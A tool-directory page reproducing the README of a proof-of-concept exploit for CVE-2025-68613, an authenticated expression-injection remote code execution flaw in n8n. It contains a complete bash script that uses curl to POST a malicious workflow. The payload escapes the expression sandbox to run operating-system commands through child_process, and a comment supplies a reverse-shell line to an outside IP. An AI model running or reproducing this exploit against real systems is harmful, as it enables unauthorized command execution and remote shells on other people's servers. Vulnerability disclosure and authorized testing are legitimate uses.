Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613 — Proof-of-Concept exploit for CVE-2025-68613: Authenticated Remote Code Execution in n8n via Expression Injection | Kitploit
Tools/GitHubGitHub/mbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access ToolPayload Development
GitHub
mbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613

n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613

Proof-of-Concept exploit for CVE-2025-68613: Authenticated Remote Code Execution in n8n via Expression Injection

View Repository
249 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

n8n Authenticated Expression Injection RCE – CVE-2025-68613

Critical Remote Code Execution (CVSS 9.9) in n8n Workflow Automation Tool
Proof of Concept – For educational and authorized security research use only


⚠️ Important Legal Warning

This code is provided STRICTLY for educational purposes and authorized security testing in controlled lab environments.

Unauthorized use on production systems or any system without explicit written permission is illegal and violates computer misuse and cybersecurity laws in most jurisdictions.

Use at your own risk. The author is not responsible for any misuse.


Vulnerability Information

FieldDetails
Exploit Titlen8n Authenticated Expression Injection Remote Code Execution
CVECVE-2025-68613
Disclosure Date2025-12-25
AuthorMohammed Idrees Banyamer
Author CountryJordan
Contact / SocialInstagram: @banyamer_security
GitHubmbanyamer
Vendorn8n.io
Software Repositorygithub.com/n8n-io/n8n
Vulnerable Versions≥ 0.211.0 < 1.120.4
Patched Versions1.120.4, 1.121.1, 1.122.0 and above
Tested Onn8n 1.119.3 (Docker)
Vulnerability TypeAuthenticated Remote Code Execution via Expression Sandbox Escape
CVSS Score9.9 (Critical)

Description

This vulnerability allows an authenticated user to create or modify workflows using malicious expressions that bypass n8n's expression sandbox, resulting in full operating system command execution with the privileges of the n8n process.


Proof of Concept – Bash Exploit Script

#!/bin/bash
# Exploit Title: n8n Authenticated Expression Injection RCE
# Date: 2025-12-25
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://n8n.io
# Software Link: https://github.com/n8n-io/n8n
# Version: >=0.211.0 <1.120.4
# Tested on: n8n 1.119.3 (Docker)
# CVE : CVE-2025-68613

TARGET="http://localhost:5678"                  # ← Change to your target
API_KEY="your_n8n_api_key_here"                 # ← Insert valid API Key (or use Basic Auth / session)
CMD="id"                                        # ← Test command
# Example reverse shell: "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"

echo "[*] Sending malicious workflow to ${TARGET}"

curl -s -X POST "${TARGET}/rest/workflows" \
  -H "Content-Type: application/json" \
  -H "X-N8N-API-KEY: ${API_KEY}" \
  -d '{
    "name": "CVE-2025-68613 PoC",
    "active": false,
    "nodes": [
      {
        "parameters": {
          "values": {
            "string": [
              {
                "name": "result",
                "value": "'${PAYLOAD}'"
              }
            ]
          }
        },
        "name": "Exploit",
        "type": "n8n-nodes-base.set",
        "typeVersion": 1,
        "position": [460, 300]
      }
    ],
    "connections": {}
  }'

echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"
Download Tool